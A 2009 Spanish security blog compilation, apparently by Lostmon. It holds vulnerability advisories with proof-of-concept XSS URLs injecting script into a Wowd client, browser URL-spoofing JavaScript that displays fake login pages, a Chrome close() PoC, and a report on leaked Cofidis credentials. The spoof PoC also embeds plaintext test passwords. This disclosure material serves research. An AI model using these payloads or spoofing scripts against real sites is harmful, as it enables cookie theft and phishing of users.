Wowd search client multiple variable XSS

##########################################
Wowd search client multiple variable XSS
URL afectada: http://www.wowd.com/
Avisado por: http://lostmon.blogspot.com/2009/10/wowd-search-client-multiple-variable.html
Notificación al vendedor: SÍ exploit disponible: SÍ
##########################################

################
¿Qué es Wowd?
################

Wowd es un motor de búsqueda que sirve para descubrir lo más popular de las webs en tiempo real.

En esencia, la compañía ha hecho un p2p como motor de búsqueda, por lo que otros usuarios Wowd que hay en línea pueden estudiar y usar sitios del ranking basada en una estructura de enlaces arcanos.

Teniendo una búsqueda y dividiéndola en millones de pequeñas piezas todas ellas dirigidas por los usuarios individuales que han descargado el cliente Wowd cambia completamente la operación – y la economía – del motor de búsqueda. Cuantas más veces clicken dentro de Wowd en un enlace dentro de un tiempo “x” el ranking será más alto ya que es mayor el vínculo.

##########################
Descripción de la vulnerabilidad
##########################

El cliente Wowd contiene un error que permite a ejecutar un codigo remoto cross site scripting (XSS). Este error existe porque la aplicación no es valida en el cuadro de diálogo URI ” SortBy ‘tags’ y ‘variables CTX’ en envio a script ‘index.html’. Esto podría permitir a un usuario crear especialmente un código a través de una dirección URL que ejecutaría arbitrariamente en el navegador de un usuario dentro de la relación de confianza entre el navegador y el servidor, esto produciría una pérdida de integridad.

Este problema puede ser peligroso, porque si se está ejecutando el cliente Wowd, usted tiene esta vulnerabilidad, porque este problema puede ser aprovechado en todos los navegadores, hasta en IE8 con el filtro anti-XSS (WoW!)

#################
Versiones
################·

Wowd client 1.3.0

#################
SOLUCIÓN
#################

No hay solución por el momento !!!

###################
PoC
###################

#############
Prueba
#############

Puedo probar en IE8, Firefox 3.5.3 y Safari 4

 

En todos los casos que el XSS se ejecuta incluso a IE8 con anti-XSS

un usuario remoto puede redactar un documento html con un iframe y esta fuente para el iframe:

http://localhost:8101/wowd/index.html?search&sortby=rank%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

el navegador ejecuta el XSS, y se  accede directamente a esta dirección URL:

 

de forma adicional Wowd puede mostrar sus resultados, ya que tenemos una funcionalidad para agregar “etiquetas” a una dirección URL.

Ejemplo:

http://localhost:8101/wowd/index.html?search&query=a&
sortby=rank&tags=english|S0B0707656E676C6973680D02

Esto muestra una búsqueda indexada con la etiqueta ‘english’, se puede añadir una etiqueta diseñada por tí mismo que permita la ejecución de un XSS como: [tag]|[token]

ejemplo:

http://localhost:8101/wowd/index.html?search&query=a
&sortby=rank&tags=english|S0B0707656E676C6973680D02,
%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E|S0B0707656E676C6973680D02

y se ejecuta el XSS en las etiquetas de las etiquetas creadas

 

CTX se vé también variablemente afectado

http://localhost:8101/wowd/index.html?search&page=2&q=
&sortby=rank&tags=news|S0807046E6577730D02&ctx=1995393737681%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

############## €nd ###################

Thnx To estrella to be my light
Thnx to all Lostmon Team !
–
atentamente:
Lostmon (lostmon@gmail.com)
——–
Browser: Internet Explorer 8 (Windows)
Browser: Firefox 3.5 (Windows)
Browser: Safari 4 (Windows)
———-

thz Lost

Cofidis.es pudo ver sus datos comprometidos

###########################################
Cofidis.es pudo ver sus datos comprometidos
Afectado: www.cofidis.es
Falla: cedenciales criticas al descubierto
###########################################

Cofidis es una empresa formada por varios grupos de crédito que agrupan diferentes servicios dentro del panorama de finanzas mundiales.

La definición según podemos leer en su web:

“Somos líderes europeos del crédito por teléfono: tenemos más de 8 millones de clientes. En España, Ya contamos con más de 15 años de experiencia y un equipo de más de 800 colaboradores.”

Cofidis.es pudo verse afectado por un fallo atraves del cual podrían terceras personas haber podido tener acceso
a datos de carácter personal, al haber dejado al descubierto las credenciales de acceso root al portal y así mismo al dejar al descubierto las credenciales de acceso a la base de datos del portal.

Para hacernos una idea de qué tipo de datos pueden haber sido vistos o “robados” por terceros, tan solo debemos mirar uno de los formularios de solicitud de crédito, y por los datos que se nos piden se puede saber qué tipo de datos podría contener la base de datos.

https://www.espaciocliente.cofidis.es/cofidis/preapprove/PreApproveContractDisplayAction.do

Esta noticia Llego a mí, después observar un post en Twitter en el cual se daba una url del portal Cofidis.es y el acceso
a un txt sin ningún tipo de protección, y el cual contenía las credenciales antes mencionadas.

Después de observar esta situación, y hablado con algunos de los miembros del grupo de discusión e investigación, decidimos mirar desde cuando podía haberse dado esta circunstancia y el posible origen de la noticia. Haciendo una búsqueda rápida en los motores de búsqueda habituales Llegamos a un Post en twitter del día 12-10-2009.

Y uno posterior del día 13-10-2009.

Y otro mas el dia 13-10-2009.

El día 14-10-2009 por la tarde el txt que contenía estascredenciales fue retirado del raíz del portal cofidis.es
Con lo cual se puede pensar que esos datos tan sensibles pudieron estar al alcance de todo el mundo durante al
menos tres días.

Google muestra en su cache, una imagen de dicho documento con fecha Del día 13-10-2009 mostrando las credenciales:

http://209.85.229.132/search?q=cache:nrpZAY7spqYJ:www.cofidis.es/cofidis.txt+http://www.cofidis.es/cofidis.txt&cd=8&hl=es&ct=clnk&gl=es

Pero esta sería la fecha en la cual google tomo esa instantánea de ese documento, pudiendo haber reemplazado a una anterior a eso, los logs del servidor de cofidis deberían mostrar cuando fue la primera vez que el spider de google pudo rastrear ese txt.

Así mismo si realizamos una búsqueda en google por el fichero txt entre los resultados primeros puede apreciarse que Google también revela esas credenciales faltaría saber cuando fue incluido en la Indexación ese archivo, para intentar averiguar desde que fecha se pudo haberse producido esta situación.

http://www.google.es/search?q=cofidis.txt

Como pudo Un administrador dejar deliberadamente un archivo con información tan sensible a la vista de cualquier visitante, se preguntara más de uno.

Seguramente el admin no sabía nada de la existencia de ese fichero, o eso creemos o queremos creer) Debió ser un hackeo , por el tipo de fichero generado y su disposición y los datos que contiene podría haberse tratado de algún agujero de seguridad en la web , a traves del cual el atacante hubiese podido incluir algún archivo externo
( esta vulnerabilidad es conocida como RFI (o remote file include) pues hay algunos scripts de los que corren por la red, que justamente hacen eso y mirando su fuente se puede observar que justamente sacan esos datos de la maquina o inyectan una Shell en php.

Creo que cofidis debería dar explicaciones de este hecho y así mismo debería verse como le afecta este acontecimiento a cofidis, ante la LOPD y que datos han sido comprometidos, no por mi porque por suerte yo no me encuentro en su base de datos que yo sepa, pues nunca necesite sus servicios.

Desde el grupo de investigación y desarrollo de Lostmon’s Groups queremos hacer un llamamiento a que las empresas como cofidis y otras que trabajan con datos personales tan sensibles y de tanta confidencialidad, deberían invertir parte de sus beneficios en asegurar que esos datos no estarán accesibles y deberían hacer lo posible por protegerlos como se les pide en la LOPD.

Bien es cierto que en seguridad, no hay nada seguro, o que lo bonito de la seguridad es la inseguridad que trae por si
misma. Y bien es cierto que por mucho que los administradores pongan énfasis y empeño en asegurar servicios y sistemas, siempre hay gente, que va por delante de ellos.

Este analisis ha sido realizado por cLimbo y por Lostmon

thank to all Lostmon groups team
Thnx to estrella to be my ligth

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
–
La curiosidad es lo que hace mover la mente….

Descarga Zone Alarm Pro y pruébalo gratis hoy, 13 de Octubre de 2009

Hoy y sólo hoy, Zone Labs ofrece para descargar de forma gratuita su firewall Zone Alarm Pro, como ya hicieron en noviembre del año pasado. La oferta comenzará sobre las 15:00 hora española, y durará justo 24 horas.

Zone Alarm Pro es uno de los software de seguridad más completos del mercado. Lo vengo usando desde hace años en su versión gratuita, y con estas ofertas aprovecho para pasar otros ordenadores a la versión completa. Durante un tiempo, tenía un grave problema de consumo incremental de recursos, pero eso pasó y han conseguido reducir su apetito de memoria hasta un punto razonable.

Si no estás acostumbrado a usarlo y te da por probarlo, ahí va un pequeño consejo. Cuando cualquier aplicación intente acceder a la red, te aparecerá un cuadro de diálogo, indicando si es un acceso a Internet o a la red local, y si el acceso es de descarga, como servidor, o de envío de correo.

Si marcas la casilla “no volver a preguntar”, esa aplicación se guarda en la lista de programas, con el permiso aceptado o denegado, según elijas. Ten cuidado en denegar permisos a procesos propios de Windows: si algo empieza a fallar, acude a esa lista, a ver si has denegado permisos a algún proceso importante del sistema.

Actualizado: Ya está disponible la descarga. Requiere registro, y envían un enlace a tu dirección de correo electrónico.

Enlace | Zone Alarm Pro gratuito hoy

Vía | Genbeta

IE8 Save as Title Bug

IE8 tiene un pequeño “bug“, permite denegar la función “guardar como” si el documento html tiene un título largo.

De forma predeterminada cuando un usuario intenta hacer click en “guardar como” el navegador utiliza el título del HTML como el nombre del archivo para guardarlo, pero si este título es muy largo, el explorador da un error porque no puede guardar este archivo.

Internet Explorer no guarda los archivos que en el nombre contienen más de 261 caracteres, ya que el Explorador da un aviso con un error de que el archivo no se puede guardar.

Creo que esto no tiene implicación alguna en la seguridad, le envié un mail a MSRC comentándoles la cuestión  y ellos piensan lo mismo.

Respuesta de MSRC:

“De acuerdo con su apreciación de que este no parece ser una cuestión de seguridad, puede ser un error y informaré para que lo tengan en cuenta en un futuro al sacar una no-actualización de seguridad”

Aquí tenéis el PoC de este “bug”, es muy simple;

<HTML>
<TITLE>A*261 chars</TITLE>
<HTML>

###########End #################

thank to all Lostmon groups team
Thnx to estrella to be my ligth

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/

———–

thz Lost

Bloquear pantalla en Linux, Windows y Mac OS X

Existen varias maneras de bloquear la pantalla de nuestro sistema operativo para que al volver al ordenador nos pida contraseña de acceso y de esta manera uno pueda tener sus escritorio a salvo de mirones y nadie pueda acceder a lo que estamos trabajando mientras mantenemos el escritorio y la sesión activos tal como los dejamos.

En Windows es lo más sencillo del mundo, bajo la combinación de tecla Windows+L nos aparecerá el diálogo de escritorio bloqueado como veis en la captura, así de simple. En Linux es igualmente bastante sencillo, sólo hay que configurar algún atajo de teclado en Sistema → Preferencias → Combinaciones de teclas para activar el “Lock Screen” o bloqueo de pantalla.

En cambio, bajo Mac OS X es un poco más difícil, en el vía tenéis los pasos a seguir, que incluyen activar el cambio de usuario rápido en Sistema → Cuentas y luego en Seguridad marcar la opción “Solicitar contraseña para reactivar el equipo si está en reposo o con el salvapantallas”.

Continuar leyendo ‘Bloquear pantalla en Linux, Windows y Mac OS X’

Logran crackear el sistema WPA en 1 minuto

WPA y WPA2 son los sistemas de cifrado que se utilizan actualmente en la mayoría de las redes WiFi que existen y si bien se sabe que sacar la contraseña de las conexiones no es nada del otro mundo y se puede hacer en cuestión de tiempo, lo que hicieron unos investigadores japoneses es lograr crackear la WPA en nada menos que 1 minuto.

Lo que hicieron fue crear un sistema llamado Temporal Key Integrity Protocol y si bien no explicaron a la perfección cómo funciona y qué es lo que hace el sistema de crackeo, lograron romper su propio récord, ya que el año pasado tardaban entre 12 y 15 minutos.

Además comentaron que este sistema no funciona con WPA2 ya que utiliza una encriptación más avanzada (Advanced Encryption Standard). Sea como sea, ya sabes que si tienes un red WiFi en casa, lo mejor que puedes ir haciéndo es ponerle WPA2, ya que la seguridad de tu red puede ser vulnerada en sólo 60 segundos.

Vía | ALT1040.

Multiple Browsers Fake url folder & file Same origin Spoof

#########################################
Multiple Browsers Fake url folder & file Same origin Spoof
Artículo original: http://lostmon.blogspot.com/2009/08/multiple-browsers-fake-url-folder-file.html
##########################################

##############
Resumen
##############

Un usuario abre su navegador e intenta entrar en http://www.host.com/admin/admin.php y se encuentra en esta URL
el servidor remoto y si el usuario tiene privilegios, puede acceder al archivo admin.php

Si el archivo admin.php no existe en el servidor al usuario le da un erorr 404 el servidor http.

Si el usuario intenta entrar a http://www.host.com/admin/  y esta dir no está en el servidor, el usuario obtiene de nuevo un http error 404.

Si el usuario pulsa el botón recargar la página vuelve a cargar el contenido y si el usuario presiona CTRL + F5 actualiza todo el contenido de la página.

Algunas veces los errores http como 404, 403, etc son administrados por una tercera parte, una barra de herramientas, o con un contenido predefinido dinámico construido en el interior del navegador.

#######################
Explicación
#######################

Múltiples navegadores tienen un error en esta solicitud de respuesta que permiten a un atacante suplantar la url o falso el contenido de un archivo o ruta inexistente o falsa la url y el contenido de un archivo o una ruta de confianza.

También un atacante puede “trampear” la falsa url del explorador en internet y cuando el usuario pulse la tecla F5 o el botón Actualizar, muestre la página con el contenido falso o si el usuario presiona CTRL + F5 la página muestre el contenido falso, sólo en este último caso, el navegador Opera no funciona.

##################
Pruebas
##################

He estado probando con Windows XP Home SP3 con todos los parches.

Para la prueba vamos a escribir una secuencia de comandos como:

####################
CÓDIGO FUENTE DE POC
####################
Prueba de Concepto en línea => http://cmspatch.200u.com/urlspoof.html

<html>
<head></head><body>
<title>Multiple Browsers Fake url folder & file Same Origin Spoof</title>
<center>
<h1>Multiple Browsers Fake url folder & file Same origin Spoof By Lostmon</h1>
</center>
<p>
<a href=’modules/profile/admin/admin.php’ target=’_blank’><h2>real path</h3></a>
<a href=’javascript:spoofolder()’><h2>spoof a url folder !!</h2></a> Non existent path
<a href=’javascript:spoofile()’><h2>spoof a url file !!</h2></a> this file exist in the server.
<a href=’javascript:spoofauth()’><h2>spoof a url with auth basic !!</h2></a><br>only exist Protected and have password.
<p></p>
<strong>pass for the cms. user Dismark pass souaktendio.</strong><br>
<strong>pass for Portected folder. user terrapro pass mayoristas.</strong>
<p>

<script>
function spoofolder()
{
a = window.open(‘modules/login’)
a.document.write(‘<H1>FAKE LOGIN PAGE<\h1>’)
a.document.write(‘<title>FAKE LOGIN PAGE</title>’)
a.alert(document.location)
a.stop();
}
function spoofile()
{
a = window.open(‘modules/system/admin.php’)
a.document.write(‘<H1>FAKE LOGIN PAGE<\h1>’)
a.document.write(‘<title>FAKE LOGIN PAGE</title>’)
a.alert(document.location)
a.stop();
}
function spoofauth()
{
a = window.open(‘protected/admin/admin.php’)
a.document.write(‘<H1>FAKE LOGIN PAGE<\h1>’)
a.document.write(‘<title>FAKE LOGIN PAGE</title>’)
a.alert(document.location)
a.stop();
}
</script>
</body></html>

######## FIN DEL CÓDIGO #####

Lo guardamos como c:/test/urlspoof.html por ejemplo.

Yo uso una alerta para mostrar la verdadera window.location.

para la prueba he abierto el archivo con file:/// que es un manejador de protocolo y remoto, para la prueba he cargado el archivo en un servidor:  un apache en windows 2003 y en un Apache sobre Linux Red Hat.

servidor de windows:

Windows Server 2003
Apache/2.2.8 Win32
PHP/5.2.6
Server at ***********.com

servidor de linux:

Apache/2.2.11 (Unix) mod_ssl/2.2.11
OpenSSL/0.9.8e-fips-rhel5
mod_auth_passthrough/2.1
FrontPage/5.0.2.2635 Server
at ***********.com

en todos los casos de prueba el servidor envía la correctamente la respuesta HTTP.

########################
Navegadores afectados en local
########################

Para esta prueba el uso de archivos i manejador de protocolo y
sólo archivo de prueba y falso camino falso.

1 – Firefox 3.5.1 y 3.5.2
urlspoof es abierto a través del archivo c:/test/urlspoof.html y al hacer clic en cualquier función en falso al firefox, muestran la falsa url y el contenido. (firefox 3.5.2 no parece vulnerable)

2 – Lunascape 5.1.3 y 5.1.4 (Trident swiched a motor)
urlspoof abierto a través de archivo c:/test/urlspoof.html y hacer clic en cualquier función en falso al Lunascape muestra los casos de url falsa y el contenido falseadas.

3 – Orca 1,2 build 2 no parecen vulnerables, pero cuando busca el archivo al añadir a los navegadores wyciwyg url://4/ ejecuta el contenido falso.

4 – Flock 2.5.1
urlspoof es abierto a través del archivo c:/test/urlspoof.html y haga clic en falso en cualquier función en todos los casos muestran la url falsa y el contenido falseadas.

5 – K-Meleon 1.5.3
urlspoof es abierto a través del archivo c:/test/urlspoof.html y haga clic en falso en cualquier función en todos los casos K-Meleon muestra la url falsa y el contenido falseadas.

6 – SeaMonkey 1.1.17
urlspoof es abierto a través del archivo c:/test/urlspoof.html y haga clic en
falso en cualquier función, en todos los casos muestra la url falsa y el contenido falseadas.

7 – Avant 11,7 build 36
urlspoof es abierto a través de archivo c: /prueba/urlspoof.html y haga clic en falso en cualquier función, en todos los casos muestran la url falsa y el contenido falseadas.

Google Chrome 2.0.172.39 (Build oficial)
escribe en todos los casos en about: blank.

Internet Explorer 8 no parece vulnerable a través de file: protocol

########################
Navegadores remotos afectados
########################

Para esta prueba de seguridad, subid el archivo a un servidor y busca el archivo a través de http://host.com/urlspoof.html

1 – Internet Explorer 7 y 8
Vaya al archivo y haga clic en cualquier enlace, el navegador en todas las pruebas muestra el árbol de archivos falsa, patch falso, y “pseudo-bypass”

2 – Avant 11,7 build 35 y build 36
Vaya a archivo y haga clic en cualquier enlace, el navegador en todas las prueba muestran el árbol de archivos falsa, patch falso, y “pseudo-bypass” auth basic protection.

1 – Internet Explorer 7 y 8
Vaya a archivo y haga clic en cualquier enlace, el navegador en todas las
prueba muestran el árbol de archivos falsa, falsa vía, y “pseudo-bypass”
autoridades de protección básica.

2 – Avant 11,7 navegador construir 35 y construir 36
Vaya a archivo y haga clic en cualquier enlace, el navegador en todas las
prueba muestran el árbol de archivos falsa, falsa vía, y “pseudo-bypass”
autoridades de protección básica.

3 – Lunascape 5.1.3 y 5.1.4 (Trident swiched a motor)
Vaya al archivo y haga clic en cualquier enlace, el navegador en todas las prueba muestra el árbol de archivos falsos, patch falso, y “pseudo-bypass” auth basic protection.

4 – Navegador Maxthon 2.5.3.80 UNICODE
Vaya al archivo y haga clic en cualquier enlace, el navegador en todas las pruebas muestra el árbol de archivos falsos, patch falso, y “pseudo-bypass” auth basic protection.

Google Chrome escribe en todos los casos en el about:blank

#################
Trampa en cuestión
#################

Todas las superficies afectadas de los navegadores, cuando usted está en la url falsa al  intentar actualizar la ubicación, a través de CTRL + F5, f5 o similares, el navegador no mostrará un error HTTP 404, que siguen mostrando la ubicación de la página falsa.

Es muy interesante, porque un atacante puede crear un archivo “fantasma” en una dir “fantasma”, en el caso de la falsificación de archivos, se puede suplantar cualquier página web en el servidor, con la falsa página, cuando el usuario intenta volver a cargar o recargar el navegador muestra la página falsa: OJO! NO es la ubicación real de la página.

##################€nd ##################

Thnx to cLimbo for Spread the Word
Thnx to estrella to be my ligth.
Thnx to all Lostmon Groups Team.

–
atentamente:
Lostmon (lostmon@gmail.com)
——-

thz Lost

Bing.com WebmasterAuthenticationInformationPage.aspx XSS

###########################################
Bing.com WebmasterAuthenticationInformationPage.aspx XSS
URL del vendedor: http://ww.bing.com
Reportado: http://lostmon.blogspot.com/2009/08/bingcom-webmasterauthenticationinformat.html
Vendedor avisado: Sí Confirmación vendedor: Sí
###########################################

El motor de búsqueda Bing, contiene un error que permite ataques cross site scripting.
Este defecto existe porque la solicitud no valida correctamente la variable ‘authTag para la presentación de ‘WebmasterAuthenticationInformationPage.aspx’ podría script. Esto permite a un usuario crear una URL especialmente preparada para ejecutar código arbitrario en el navegador de un usuario dentro de la relación de confianza entre el navegador y el servidor, lo que lleva a una pérdida de integridad.

Un atacante puede componer un enlace incorrecto en la variable ‘WebmasterAuthenticationInformationPage.aspx’ y el consiguiente código, es escribir en dos cajas y en el ‘LiveSearchSiteAuth.xml’.

Un usuario remoto puede redactar un enlace incorrecto en la variable de ‘ WebmasterXMLAuthDownloadPage.aspx’, para descargar ‘LiveSearchSiteAuth.xml’ => es éste el archivo que contiene el código malicioso.

#########
solución:
##########

Que el vendedor cree un parche

#############
Cronología:
#############

Descubierto: 18-junio-2009
notificado al vendedor: 07-08-2009
proveedores de respuesta: 07-08-2009
vendedor respuesta sobre parche: 13-08-2009
publicado: 13-08-2009

################ End #####################

Thnx to Microsoft Security Response Center (MSRC)
http://blogs.technet.com/msrc/
thnx to estrella to be my ligth
thnx to all who day after day support me !!!
–
atentamente:
Lostmon (lostmon@gmail.com)
—-

thz Lost

Vulnerabilidad en Apache ODE

Una nueva vulnerabilidad ha sido reportada en Apache ODE en la pagina de seguridad informática Secunia, que puede ser potencialmente explotada para revelar información sensible o manipular determinados archivos.

La vulnerabilidad es causada debido a un error de validación de entrada en el proceso de despliegue de servicios web en el tratamiento de mensajes.

Esto puede ser explotado para crear, sobreescribir o eliminar archivos en el servidor mediante el uso de un camino transversal que contiene las secuencias de directorio para el nombre.

+info: http://secunia.com/advisories/36249/

Vía | RetroNet

Google Chrome close() issue

##############################
Google Chrome close() issue
Vendedor: http://www.google.com/chrome/ = artículo http://lostmon.blogspot.com/2009/07/google-chrome-close-issue.html
##############################

Versión Chrome: 2.0.172.33 (Oficial)
URL (es aplicable)
Otros navegadores probados:
Safari 4: OK
Firefox 3.x: OK
IE 7: OK
IE 8: OK

¿Qué medidas producen el problema?

1 – Abrir una página web
2 – vaya a otra página.

Google Chrome automáticamente cierra la pestaña y si tenemos sólo un tab, se cierra el proceso de Chrome

¿Cuál es el resultado esperado?

Que Google Chrome no se cierre o su prompt

¿Qué sucede entonces?

Google Chrome cierra la ficha o si sólo tenemos un tab lo cierra también sin ningún tipo de confirmación.

###########
Resumen
###########

Para probar esto se necesita un servidor web instalado, y un poco de paciencia XD

#############
Prueba 1
#############

Crear un documento HTML y escribir en él lo siguiente:

<html><body onload=’close()’></body></html>
guardar como test1.html in c:\test\ para probar.

1.1 – Abrir google chrome y una vez abierto ejecutad el archivo como manejador

file:///c:/test/test1.html y observaréis que Chrome no cierra la ventana y nada desaparece

1.2 – Abrir el archivo en una zona de confianza a través de la intranet

htttp://localhost/test/test1.html o a través de ip

http://192.168.1.100/test/test1.html Chrome no cierra la ventana y nada desaparece

1.3 – Abrir y seleccionar en el disco duro el archivo c:\test\test1.html pulsar botón derecho y clickar para abrirlo con Google Chrome y se cierra automático.

si cambio a otros eventos como onblur o onfocus es interesante porque si tratamos de utilizar inspectores para ver el código fuete, tan solo haciendo click en el cuerpo del tab se muestra, pero si hacemos lo mismo, y cerramos el inspector, Chrome también se cierra.

Esto aparentemente solo afecta cuando abrimos el documento html con el método 1.3.

###############
Prueba 2
###############

Crear un nuevo documento html y meter un write dentro, y guardarlo como test2.html en la carpeta de pruebas.

:[-Google Chrome close() issue PoC By Lostmon-]:.
<html>
<head></head>
<title>.:[-Google Chrome close() issue PoC By Lostmon-]:.</title>
<body>
<script>
try { CloseCrome(); } catch(e) {
setTimeout(“location.reload();”,20);
close(); }
</script>
<h2>.:[-Google Chrome close() issue PoC By Lostmon-]:.</h2>
<p>Google Chrome :2.0.172.33 (Build oficial )<br>
WebKit 530.5<br>V8 1.1.10.13<br>
User Agent Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)<br>
AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5</p>
</body>
</html>

2.1 – Abrir el archivo a través de controlador de protocolo file:///c:/test/test2.html,

Chrome no cierra la ventana y nada desaparece pero si tratamos de navegar a otro sitio como www.google.com se cierra la pestaña automáticamente.

Continuar leyendo ‘Google Chrome close() issue’